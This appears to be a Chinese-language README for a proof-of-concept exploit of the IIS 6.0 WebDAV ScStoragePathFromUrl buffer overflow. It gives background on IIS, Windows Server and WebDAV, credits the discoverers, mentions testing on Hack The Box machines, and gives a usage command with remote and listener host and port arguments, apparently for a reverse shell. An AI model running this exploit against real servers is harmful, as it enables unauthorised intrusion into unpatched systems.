Internet Information Services (IIS) 是微软推出的一款灵活、通用的 Web 服务器,运行在 Windows 系统上,用于提供所请求的 HTML 页面或文件。IIS Web 服务器接受来自远程客户端计算机的请求并返回相应的响应。这一基本功能使 Web 服务器能够在局域网(LAN,如企业内网)和广域网(WAN,如互联网)上共享和传递信息。
Windows Server 是微软的一系列操作系统(OS),由极其强大的机器组成。Windows Server 于 2003 年 4 月首次发布。它通常安装在高负载服务器上,作为大多数 IT 公司、应用程序和服务的骨干。该服务器处理网络上的管理组相关活动。它组织、存储、发送和接收来自连接到网络的设备的文件。
WebDAV(Web Distributed Authoring and Versioning,即 Web 分布式创作和版本管理)增强了 HTTP 协议,使用户能够协作管理并编辑 Web 服务器上的文件。它支持直接通过 Web 界面进行文件共享、编辑和版本管理,提供了一种比 FTP 更具协作性且对防火墙更友好的替代方案。WebDAV 便于进行就地文件编辑,非常适合团队项目。
此脚本利用 Microsoft Windows Server 2003 R2 中 Internet Information Services (IIS) 6.0 的 WebDAV 服务中的 ScStoragePathFromUrl 函数执行缓冲区溢出攻击。
该 PoC 已在 hack the box 平台的 Granny/Grampa CTF 靶机上进行了测试。
python3 exploit.py <RHOST> <RPORT> <LHOST> <LPORT> [-v]
其中 v 是详细输出(verbose)参数,将显示调试跟踪信息。
CVE 发现者:Zhiniang Peng 与 Chen Wu。